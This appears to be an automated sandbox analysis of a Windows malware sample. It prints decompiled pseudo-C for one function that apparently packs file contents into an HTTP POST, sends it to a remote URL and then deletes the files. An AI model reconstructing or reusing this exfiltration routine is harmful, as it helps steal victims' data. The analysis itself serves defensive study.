                                                                                                                                                                        control_flow_graph 2078 407edb-407f14 2081 4080f3 2078->2081 2082 407f1a-407f21 2078->2082 2083 4080f5-4080f9 2081->2083 2082->2081 2084 407f27-407f2b 2082->2084 2084->2081 2085 407f31-407f36 2084->2085 2085->2081 2086 407f3c-407f66 2085->2086 2088 407f68 2086->2088 2089 407f7c-407fa2 2086->2089 2090 407f6a-407f7a 2088->2090 2093 407fa8-407fae 2089->2093 2094 408069-4080b4 2089->2094 2090->2089 2090->2090 2095 407fb0-40805a call 40a4c2 call 40a503 * 12 2093->2095 2104 4080b6-4080d1 2094->2104 2105 40811f-408133 2094->2105 2175 408060-408066 2095->2175 2111 4080d3-4080ea 2104->2111 2112 4080fa-408104 2104->2112 2119 408275-4082d0 call 40a55d * 4 lstrcpyn 2105->2119 2120 408139-40813f 2105->2120 2111->2081 2112->2105 2122 408106-408116 2112->2122 2159 4082d2-4082dc 2119->2159 2160 4082de-408329 InternetSetOptionW * 2 2119->2160 2121 408142-40820a call 40a55d * 11 2120->2121 2210 408236-40823a 2121->2210 2211 40820c-408212 2121->2211 2122->2105 2133 408118-40811c 2122->2133 2133->2105 2159->2160 2173 408406-40843e MultiByteToWideChar 2160->2173 2174 40832f-40835f 2160->2174 2187 408440-408464 MultiByteToWideChar 2173->2187 2188 408469-40846b 2173->2188 2181 408365-4083a0 2174->2181 2182 4083ff-408400 InternetCloseHandle 2174->2182 2175->2094 2190 4083a2-4083c6 HttpSendRequestW 2181->2190 2191 4083f6-4083f9 InternetCloseHandle 2181->2191 2182->2173 2187->2188 2192 408474-408490 2188->2192 2193 40846d 2188->2193 2200 4083c8-4083cd 2190->2200 2201 4083ec-4083f3 InternetCloseHandle 2190->2201 2191->2182 2192->2083 2193->2192 2203 4083da-4083ea 2200->2203 2201->2191 2203->2201 2207 4083cf-4083d4 2203->2207 2207->2201 2209 4083d6 2207->2209 2209->2203 2213 408245-408249 2210->2213 2214 40823c 2210->2214 2211->2210 2212 408214-408229 2211->2212 2218 40822b 2212->2218 2219 40822e-408230 CloseHandle 2212->2219 2215 40824b-408254 DeleteFileW 2213->2215 2216 40825d-40826c 2213->2216 2214->2213 2215->2216 2216->2121 2221 408272 2216->2221 2218->2219 2219->2210 2221->2119
                                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                                        			E00407EDB(short* __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				void _v44;
                                                                                                                                                                        				void _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t121;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t128;
                                                                                                                                                                        				void* _t129;
                                                                                                                                                                        				void* _t131;
                                                                                                                                                                        				void* _t132;
                                                                                                                                                                        				char _t148;
                                                                                                                                                                        				void* _t164;
                                                                                                                                                                        				void* _t166;
                                                                                                                                                                        				long _t168;
                                                                                                                                                                        				long _t169;
                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				void* _t179;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t183;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t211;
                                                                                                                                                                        				void* _t212;
                                                                                                                                                                        				void* _t215;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        				void* _t217;
                                                                                                                                                                        				void* _t218;
                                                                                                                                                                        				void* _t220;
                                                                                                                                                                        				void* _t223;
                                                                                                                                                                        				void* _t224;
                                                                                                                                                                        				intOrPtr _t226;
                                                                                                                                                                        				intOrPtr* _t227;
                                                                                                                                                                        				signed int _t229;
                                                                                                                                                                        				void* _t282;
                                                                                                                                                                        				intOrPtr _t285;
                                                                                                                                                                        				intOrPtr _t286;
                                                                                                                                                                        				intOrPtr _t288;
                                                                                                                                                                        				intOrPtr _t293;
                                                                                                                                                                        				intOrPtr _t294;
                                                                                                                                                                        				intOrPtr _t296;
                                                                                                                                                                        				intOrPtr _t297;
                                                                                                                                                                        				intOrPtr _t300;
                                                                                                                                                                        				intOrPtr _t301;
                                                                                                                                                                        				intOrPtr _t302;
                                                                                                                                                                        				intOrPtr _t303;
                                                                                                                                                                        				intOrPtr* _t304;
                                                                                                                                                                        				intOrPtr _t306;
                                                                                                                                                                        				intOrPtr _t308;
                                                                                                                                                                        				intOrPtr _t309;
                                                                                                                                                                        				intOrPtr _t312;
                                                                                                                                                                        				intOrPtr _t313;
                                                                                                                                                                        				intOrPtr _t314;
                                                                                                                                                                        				intOrPtr _t315;
                                                                                                                                                                        				intOrPtr _t317;
                                                                                                                                                                        				void* _t318;
                                                                                                                                                                        				signed int _t319;
                                                                                                                                                                        				void* _t320;
                                                                                                                                                                        				void* _t321;
                                                                                                                                                                        				void* _t323;
                                                                                                                                                                        				void* _t326;
                                                                                                                                                                        				signed short* _t328;
                                                                                                                                                                        				void* _t329;
                                                                                                                                                                        				intOrPtr* _t330;
                                                                                                                                                                        				void* _t331;
                                                                                                                                                                        				void* _t333;
                                                                                                                                                                        				void** _t338;
                                                                                                                                                                        				void* _t339;
                                                                                                                                                                        
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_t327 = __ecx;
                                                                                                                                                                        				_t224 =  *((intOrPtr*)( *0x40e044))(0x40, 0xc350);
                                                                                                                                                                        				_v24 = _t224;
                                                                                                                                                                        				_t318 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_v28 = _t318;
                                                                                                                                                                        				if( *__ecx != 0x68) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t109 = 0x74;
                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 2)) != _t109 ||  *((intOrPtr*)(__ecx + 4)) != _t109 ||  *((short*)(__ecx + 6)) != 0x70) {
                                                                                                                                                                        					goto L14;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t7 = _t327 + 8; // 0x4589d0ff
                                                                                                                                                                        					_v32 =  *_t7 & 0x0000ffff;
                                                                                                                                                                        					_t112 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e3ec);
                                                                                                                                                                        					_v16 = 0x2f;
                                                                                                                                                                        					_t282 = 0;
                                                                                                                                                                        					_t10 = _t112 + 6; // 0x6
                                                                                                                                                                        					_t328 = _t10;
                                                                                                                                                                        					_t113 =  *_t328 & 0x0000ffff;
                                                                                                                                                                        					_t229 = _t113;
                                                                                                                                                                        					if(_t113 == _v16) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_t115 =  *((intOrPtr*)( *0x40e08c))(_t318);
                                                                                                                                                                        						_t319 = _a4;
                                                                                                                                                                        						_v52 =  &(_t328[_t115]);
                                                                                                                                                                        						_t119 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 << 0x15);
                                                                                                                                                                        						_v8 = _t119;
                                                                                                                                                                        						if(_t319 <= 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t121 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							_v16 = _t121;
                                                                                                                                                                        							_t329 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 << 0x14);
                                                                                                                                                                        							_t123 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 + _a12 << 0x14);
                                                                                                                                                                        							_v12 = _t123;
                                                                                                                                                                        							_t320 = _t123;
                                                                                                                                                                        							_t124 = _v16;
                                                                                                                                                                        							if(_t124 == 0) {
                                                                                                                                                                        								L19:
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_t329);
                                                                                                                                                                        								if(_a12 <= 0) {
                                                                                                                                                                        									L32:
                                                                                                                                                                        									_t128 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
                                                                                                                                                                        									_t285 =  *0x40e3dc; // 0x64aed8
                                                                                                                                                                        									_t129 = E0040A55D(_t128, _t285);
                                                                                                                                                                        									_t286 =  *0x40e43c; // 0x64af48
                                                                                                                                                                        									_t131 = E0040A55D(E0040A55D(_t129, _t286), _v20);
                                                                                                                                                                        									_t288 =  *0x40e43c; // 0x64af48
                                                                                                                                                                        									_t132 = E0040A55D(_t131, _t288);
                                                                                                                                                                        									_t330 =  *0x40e004; // 0x74656940
                                                                                                                                                                        									_v20 = _t132;
                                                                                                                                                                        									_push( *((intOrPtr*)( *0x40e198))(_t132) + 1);
                                                                                                                                                                        									_push(_v20);
                                                                                                                                                                        									_push(_t320);
                                                                                                                                                                        									if( *_t330() != 0) {
                                                                                                                                                                        										_t320 = _t320 +  *((intOrPtr*)( *0x40e198))(_v20);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        									_v44 = 0x927c0;
                                                                                                                                                                        									_v48 = 0x927c0;
                                                                                                                                                                        									_t331 =  *((intOrPtr*)( *0x40e124))(L"rqwrwqrqwrqw", 0, 0, 0, 0);
                                                                                                                                                                        									_v36 = _t331;
                                                                                                                                                                        									InternetSetOptionW(_t331, 6,  &_v44, 4);
                                                                                                                                                                        									InternetSetOptionW(_t331, 5,  &_v48, 4);
                                                                                                                                                                        									if(_t331 == 0) {
                                                                                                                                                                        										L45:
                                                                                                                                                                        										_t333 = MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(0) + 1, _t224, 0);
                                                                                                                                                                        										_v52 = _t333;
                                                                                                                                                                        										_t148 = _t333 + _t333;
                                                                                                                                                                        										_v40 = _t148;
                                                                                                                                                                        										_t321 =  *((intOrPtr*)( *0x40e044))(0x40, _t148);
                                                                                                                                                                        										if(_t333 != 0) {
                                                                                                                                                                        											MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(_v52) + 1, _t224, _t321);
                                                                                                                                                                        											 *((short*)(_v40 + _t321 - 2)) = 0;
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_t321 != 0) {
                                                                                                                                                                        											LocalFree(_t321);
                                                                                                                                                                        										}
                                                                                                                                                                        										LocalFree(_v28);
                                                                                                                                                                        										LocalFree(_t224);
                                                                                                                                                                        										LocalFree(_v12);
                                                                                                                                                                        										return 1;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t162 =  ==  ? 0x1bb : 0;
                                                                                                                                                                        										_t163 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
                                                                                                                                                                        										_t164 =  *((intOrPtr*)( *0x40e180))(_t331, _v28, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3, 0, 1);
                                                                                                                                                                        										_v20 = _t164;
                                                                                                                                                                        										if(_t164 == 0) {
                                                                                                                                                                        											L44:
                                                                                                                                                                        											InternetCloseHandle(_t331);
                                                                                                                                                                        											goto L45;
                                                                                                                                                                        										}
                                                                                                                                                                        										_v40 = 0xc00000;
                                                                                                                                                                        										_t248 =  ==  ? _v40 : 0x400000;
                                                                                                                                                                        										_t166 =  *((intOrPtr*)( *0x40e0b8))(_t164,  *0x40e25c, _v52, 0, 0, _a24,  ==  ? _v40 : 0x400000, 0x73, 1);
                                                                                                                                                                        										_t224 = _v24;
                                                                                                                                                                        										_v52 = _t166;
                                                                                                                                                                        										if(_t166 == 0) {
                                                                                                                                                                        											L43:
                                                                                                                                                                        											InternetCloseHandle(_v20);
                                                                                                                                                                        											goto L44;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t168 = _v12;
                                                                                                                                                                        										_t169 =  *((intOrPtr*)( *0x40e08c))(_t320 - _t168);
                                                                                                                                                                        										_t323 = _v52;
                                                                                                                                                                        										if(HttpSendRequestW(_t323, _a20, _t169, _a20, _t168) == 0) {
                                                                                                                                                                        											L42:
                                                                                                                                                                        											InternetCloseHandle(_t323);
                                                                                                                                                                        											_t331 = _v36;
                                                                                                                                                                        											goto L43;
                                                                                                                                                                        										}
                                                                                                                                                                        										while(1) {
                                                                                                                                                                        											_push( &_v32);
                                                                                                                                                                        											_push(0xc350);
                                                                                                                                                                        											_push(_t224);
                                                                                                                                                                        											_push(_t323);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e0fc))() == 0) {
                                                                                                                                                                        												goto L42;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t174 = _v32;
                                                                                                                                                                        											if(_t174 == 0) {
                                                                                                                                                                        												goto L42;
                                                                                                                                                                        											}
                                                                                                                                                                        											 *((char*)(_t224 + _t174)) = 0;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L42;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								_t226 = _a12;
                                                                                                                                                                        								_t338 = _a16 + 4;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t178 =  *((intOrPtr*)( *0x40e14c))( *_t338, 0);
                                                                                                                                                                        									_v36 = _t178;
                                                                                                                                                                        									_t49 = _t178 + 0x400; // 0x400
                                                                                                                                                                        									_t179 =  *((intOrPtr*)( *0x40e044))(0x40, _t49);
                                                                                                                                                                        									_t293 =  *0x40e3dc; // 0x64aed8
                                                                                                                                                                        									_t180 = E0040A55D(_t179, _t293);
                                                                                                                                                                        									_t294 =  *0x40e43c; // 0x64af48
                                                                                                                                                                        									_t182 = E0040A55D(E0040A55D(_t180, _t294), _v20);
                                                                                                                                                                        									_t296 =  *0x40e3dc; // 0x64aed8
                                                                                                                                                                        									_t183 = E0040A55D(_t182, _t296);
                                                                                                                                                                        									_t297 =  *0x40e444; // 0x64b880
                                                                                                                                                                        									_t186 = E0040A55D(E0040A55D(E0040A55D(_t183, _t297),  *(_t338 - 4)), "\"");
                                                                                                                                                                        									_t300 =  *0x40e3dc; // 0x64aed8
                                                                                                                                                                        									_t187 = E0040A55D(_t186, _t300);
                                                                                                                                                                        									_t301 =  *0x40e3f0; // 0x64a138
                                                                                                                                                                        									_t188 = E0040A55D(_t187, _t301);
                                                                                                                                                                        									_t302 =  *0x40e3dc; // 0x64aed8
                                                                                                                                                                        									_t189 = E0040A55D(_t188, _t302);
                                                                                                                                                                        									_t303 =  *0x40e3dc; // 0x64aed8
                                                                                                                                                                        									_t190 = E0040A55D(_t189, _t303);
                                                                                                                                                                        									_v16 = _t190;
                                                                                                                                                                        									_t191 =  *((intOrPtr*)( *0x40e198))(_t190);
                                                                                                                                                                        									_t304 =  *0x40e004; // 0x74656940
                                                                                                                                                                        									_v8 = _t191;
                                                                                                                                                                        									_t54 = _t191 + 1; // 0x1
                                                                                                                                                                        									_push(_v16);
                                                                                                                                                                        									_push(_t320);
                                                                                                                                                                        									if( *_t304() != 0) {
                                                                                                                                                                        										_t320 = _t320 + _v8;
                                                                                                                                                                        										if( *_t338 != 0) {
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push( &_v40);
                                                                                                                                                                        											_push(_v36);
                                                                                                                                                                        											_push(_t320);
                                                                                                                                                                        											_push( *_t338);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e088))() != 0) {
                                                                                                                                                                        												_t320 = _t320 + _v40;
                                                                                                                                                                        											}
                                                                                                                                                                        											CloseHandle( *_t338);
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									if( *(_t338 - 4) != 0) {
                                                                                                                                                                        										LocalFree( *(_t338 - 4));
                                                                                                                                                                        									}
                                                                                                                                                                        									if(_t338[1] != 0) {
                                                                                                                                                                        										DeleteFileW(_t338[1]);
                                                                                                                                                                        										LocalFree(_t338[1]);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									_t338 =  &(_t338[4]);
                                                                                                                                                                        									_t226 = _t226 - 1;
                                                                                                                                                                        								} while (_t226 != 0);
                                                                                                                                                                        								_t224 = _v24;
                                                                                                                                                                        								goto L32;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(_t124);
                                                                                                                                                                        							_push(_t329);
                                                                                                                                                                        							_push(0xffffffff);
                                                                                                                                                                        							_push(_v8);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0xfde9);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e0e4))() != 0) {
                                                                                                                                                                        								_push(_t329);
                                                                                                                                                                        								if( *((intOrPtr*)( *0x40e198))() > 0) {
                                                                                                                                                                        									_push(_v16);
                                                                                                                                                                        									_push(_t329);
                                                                                                                                                                        									_push(_v12);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e004))() != 0) {
                                                                                                                                                                        										_t320 = _v16 - 1 + _v12;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_t224);
                                                                                                                                                                        							LocalFree(_t329);
                                                                                                                                                                        							LocalFree(_v28);
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t227 = _a8;
                                                                                                                                                                        							_v16 = _t319;
                                                                                                                                                                        							_t326 = _t119;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t209 = E0040A4C2(_v20);
                                                                                                                                                                        								_t306 =  *0x40e3f8; // 0x6589d8
                                                                                                                                                                        								_t339 = _t209;
                                                                                                                                                                        								_t211 = E0040A503(E0040A503(_t326, _t306), _t339);
                                                                                                                                                                        								_t308 =  *0x40e350; // 0x6589b8
                                                                                                                                                                        								_t212 = E0040A503(_t211, _t308);
                                                                                                                                                                        								_t309 =  *0x40e340; // 0x61fd80
                                                                                                                                                                        								_t215 = E0040A503(E0040A503(E0040A503(_t212, _t309),  *_t227), "\"");
                                                                                                                                                                        								_t312 =  *0x40e350; // 0x6589b8
                                                                                                                                                                        								_t216 = E0040A503(_t215, _t312);
                                                                                                                                                                        								_t313 =  *0x40e35c; // 0x65a878
                                                                                                                                                                        								_t217 = E0040A503(_t216, _t313);
                                                                                                                                                                        								_t314 =  *0x40e350; // 0x6589b8
                                                                                                                                                                        								_t218 = E0040A503(_t217, _t314);
                                                                                                                                                                        								_t315 =  *0x40e350; // 0x6589b8
                                                                                                                                                                        								_t220 = E0040A503(E0040A503(_t218, _t315),  *((intOrPtr*)(_t227 + 4)));
                                                                                                                                                                        								_t317 =  *0x40e350; // 0x6589b8
                                                                                                                                                                        								_t326 = E0040A503(_t220, _t317);
                                                                                                                                                                        								LocalFree(_t339);
                                                                                                                                                                        								_t25 =  &_v16;
                                                                                                                                                                        								 *_t25 = _v16 - 1;
                                                                                                                                                                        								_t227 = _t227 + 0xc;
                                                                                                                                                                        							} while ( *_t25 != 0);
                                                                                                                                                                        							_t224 = _v24;
                                                                                                                                                                        							_v8 = _t326;
                                                                                                                                                                        							_t319 = _a4;
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t223 = 0;
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t282 = _t282 + 1;
                                                                                                                                                                        							 *(_t223 + _t318) = _t229;
                                                                                                                                                                        							_t223 = _t282 + _t282;
                                                                                                                                                                        							_t229 =  *(_t223 + _t328) & 0x0000ffff;
                                                                                                                                                                        						} while (_t229 != _v16);
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}



























































































                                                                                                                                                                        0x00407ef0
                                                                                                                                                                        0x00407ef3
                                                                                                                                                                        0x00407efd
                                                                                                                                                                        0x00407f06
                                                                                                                                                                        0x00407f0f
                                                                                                                                                                        0x00407f11
                                                                                                                                                                        0x00407f14
                                                                                                                                                                        0x004080f3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004080f3
                                                                                                                                                                        0x00407f1c
                                                                                                                                                                        0x00407f21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407f3c
                                                                                                                                                                        0x00407f3c
                                                                                                                                                                        0x00407f46
                                                                                                                                                                        0x00407f4f
                                                                                                                                                                        0x00407f51
                                                                                                                                                                        0x00407f58
                                                                                                                                                                        0x00407f5a
                                                                                                                                                                        0x00407f5a
                                                                                                                                                                        0x00407f5d
                                                                                                                                                                        0x00407f60
                                                                                                                                                                        0x00407f66
                                                                                                                                                                        0x00407f7c
                                                                                                                                                                        0x00407f82
                                                                                                                                                                        0x00407f84
                                                                                                                                                                        0x00407f90
                                                                                                                                                                        0x00407f9b
                                                                                                                                                                        0x00407f9d
                                                                                                                                                                        0x00407fa2
                                                                                                                                                                        0x00408069
                                                                                                                                                                        0x0040807f
                                                                                                                                                                        0x0040808f
                                                                                                                                                                        0x00408097
                                                                                                                                                                        0x004080a8
                                                                                                                                                                        0x004080aa
                                                                                                                                                                        0x004080ad
                                                                                                                                                                        0x004080af
                                                                                                                                                                        0x004080b4
                                                                                                                                                                        0x0040811f
                                                                                                                                                                        0x00408122
                                                                                                                                                                        0x00408129
                                                                                                                                                                        0x00408133
                                                                                                                                                                        0x00408275
                                                                                                                                                                        0x00408281
                                                                                                                                                                        0x00408283
                                                                                                                                                                        0x0040828b
                                                                                                                                                                        0x00408290
                                                                                                                                                                        0x004082a2
                                                                                                                                                                        0x004082a7
                                                                                                                                                                        0x004082af
                                                                                                                                                                        0x004082ba
                                                                                                                                                                        0x004082c1
                                                                                                                                                                        0x004082c7
                                                                                                                                                                        0x004082c8
                                                                                                                                                                        0x004082cb
                                                                                                                                                                        0x004082d0
                                                                                                                                                                        0x004082dc
                                                                                                                                                                        0x004082dc
                                                                                                                                                                        0x004082e1
                                                                                                                                                                        0x004082f2
                                                                                                                                                                        0x004082f5
                                                                                                                                                                        0x00408304
                                                                                                                                                                        0x0040830f
                                                                                                                                                                        0x00408312
                                                                                                                                                                        0x00408321
                                                                                                                                                                        0x00408329
                                                                                                                                                                        0x00408406
                                                                                                                                                                        0x0040842a
                                                                                                                                                                        0x0040842c
                                                                                                                                                                        0x0040842f
                                                                                                                                                                        0x00408435
                                                                                                                                                                        0x0040843a
                                                                                                                                                                        0x0040843e
                                                                                                                                                                        0x0040845d
                                                                                                                                                                        0x00408464
                                                                                                                                                                        0x00408464
                                                                                                                                                                        0x0040846b
                                                                                                                                                                        0x0040846e
                                                                                                                                                                        0x0040846e
                                                                                                                                                                        0x00408477
                                                                                                                                                                        0x0040847e
                                                                                                                                                                        0x00408487
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040832f
                                                                                                                                                                        0x0040834d
                                                                                                                                                                        0x00408350
                                                                                                                                                                        0x00408358
                                                                                                                                                                        0x0040835a
                                                                                                                                                                        0x0040835f
                                                                                                                                                                        0x004083ff
                                                                                                                                                                        0x00408400
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408400
                                                                                                                                                                        0x00408379
                                                                                                                                                                        0x00408380
                                                                                                                                                                        0x00408396
                                                                                                                                                                        0x00408398
                                                                                                                                                                        0x0040839b
                                                                                                                                                                        0x004083a0
                                                                                                                                                                        0x004083f6
                                                                                                                                                                        0x004083f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083f9
                                                                                                                                                                        0x004083a2
                                                                                                                                                                        0x004083b8
                                                                                                                                                                        0x004083ba
                                                                                                                                                                        0x004083c6
                                                                                                                                                                        0x004083ec
                                                                                                                                                                        0x004083ed
                                                                                                                                                                        0x004083f3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083f3
                                                                                                                                                                        0x004083da
                                                                                                                                                                        0x004083e2
                                                                                                                                                                        0x004083e3
                                                                                                                                                                        0x004083e4
                                                                                                                                                                        0x004083e5
                                                                                                                                                                        0x004083ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083cf
                                                                                                                                                                        0x004083d4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083d6
                                                                                                                                                                        0x004083d6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083da
                                                                                                                                                                        0x00408329
                                                                                                                                                                        0x0040813c
                                                                                                                                                                        0x0040813f
                                                                                                                                                                        0x00408142
                                                                                                                                                                        0x0040814b
                                                                                                                                                                        0x00408153
                                                                                                                                                                        0x00408156
                                                                                                                                                                        0x0040815f
                                                                                                                                                                        0x00408161
                                                                                                                                                                        0x00408169
                                                                                                                                                                        0x0040816e
                                                                                                                                                                        0x00408180
                                                                                                                                                                        0x00408185
                                                                                                                                                                        0x0040818d
                                                                                                                                                                        0x00408192
                                                                                                                                                                        0x004081b0
                                                                                                                                                                        0x004081b5
                                                                                                                                                                        0x004081bd
                                                                                                                                                                        0x004081c2
                                                                                                                                                                        0x004081ca
                                                                                                                                                                        0x004081cf
                                                                                                                                                                        0x004081d7
                                                                                                                                                                        0x004081dc
                                                                                                                                                                        0x004081e4
                                                                                                                                                                        0x004081f0
                                                                                                                                                                        0x004081f3
                                                                                                                                                                        0x004081f5
                                                                                                                                                                        0x004081fb
                                                                                                                                                                        0x004081fe
                                                                                                                                                                        0x00408202
                                                                                                                                                                        0x00408205
                                                                                                                                                                        0x0040820a
                                                                                                                                                                        0x0040820c
                                                                                                                                                                        0x00408212
                                                                                                                                                                        0x0040821c
                                                                                                                                                                        0x0040821e
                                                                                                                                                                        0x0040821f
                                                                                                                                                                        0x00408222
                                                                                                                                                                        0x00408223
                                                                                                                                                                        0x00408229
                                                                                                                                                                        0x0040822b
                                                                                                                                                                        0x0040822b
                                                                                                                                                                        0x00408230
                                                                                                                                                                        0x00408230
                                                                                                                                                                        0x00408212
                                                                                                                                                                        0x0040823a
                                                                                                                                                                        0x0040823f
                                                                                                                                                                        0x0040823f
                                                                                                                                                                        0x00408249
                                                                                                                                                                        0x0040824e
                                                                                                                                                                        0x00408257
                                                                                                                                                                        0x00408257
                                                                                                                                                                        0x00408260
                                                                                                                                                                        0x00408266
                                                                                                                                                                        0x00408269
                                                                                                                                                                        0x00408269
                                                                                                                                                                        0x00408272
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408272
                                                                                                                                                                        0x004080be
                                                                                                                                                                        0x004080bf
                                                                                                                                                                        0x004080c0
                                                                                                                                                                        0x004080c1
                                                                                                                                                                        0x004080c2
                                                                                                                                                                        0x004080c4
                                                                                                                                                                        0x004080c7
                                                                                                                                                                        0x004080c8
                                                                                                                                                                        0x004080d1
                                                                                                                                                                        0x004080ff
                                                                                                                                                                        0x00408104
                                                                                                                                                                        0x00408106
                                                                                                                                                                        0x0040810e
                                                                                                                                                                        0x0040810f
                                                                                                                                                                        0x00408116
                                                                                                                                                                        0x0040811c
                                                                                                                                                                        0x0040811c
                                                                                                                                                                        0x00408116
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408104
                                                                                                                                                                        0x004080d6
                                                                                                                                                                        0x004080dd
                                                                                                                                                                        0x004080e4
                                                                                                                                                                        0x004080ed
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407fa8
                                                                                                                                                                        0x00407fa8
                                                                                                                                                                        0x00407fab
                                                                                                                                                                        0x00407fae
                                                                                                                                                                        0x00407fb0
                                                                                                                                                                        0x00407fb3
                                                                                                                                                                        0x00407fb8
                                                                                                                                                                        0x00407fc0
                                                                                                                                                                        0x00407fcb
                                                                                                                                                                        0x00407fd0
                                                                                                                                                                        0x00407fd8
                                                                                                                                                                        0x00407fdd
                                                                                                                                                                        0x00407ffa
                                                                                                                                                                        0x00407fff
                                                                                                                                                                        0x00408007
                                                                                                                                                                        0x0040800c
                                                                                                                                                                        0x00408014
                                                                                                                                                                        0x00408019
                                                                                                                                                                        0x00408021
                                                                                                                                                                        0x00408026
                                                                                                                                                                        0x00408038
                                                                                                                                                                        0x0040803d
                                                                                                                                                                        0x0040804b
                                                                                                                                                                        0x0040804d
                                                                                                                                                                        0x00408053
                                                                                                                                                                        0x00408053
                                                                                                                                                                        0x00408057
                                                                                                                                                                        0x00408057
                                                                                                                                                                        0x00408060
                                                                                                                                                                        0x00408063
                                                                                                                                                                        0x00408066
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408066
                                                                                                                                                                        0x00407f68
                                                                                                                                                                        0x00407f68
                                                                                                                                                                        0x00407f6a
                                                                                                                                                                        0x00407f6a
                                                                                                                                                                        0x00407f6b
                                                                                                                                                                        0x00407f6f
                                                                                                                                                                        0x00407f72
                                                                                                                                                                        0x00407f76
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407f6a
                                                                                                                                                                        0x00407f66

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 0040804D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080D6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080DD
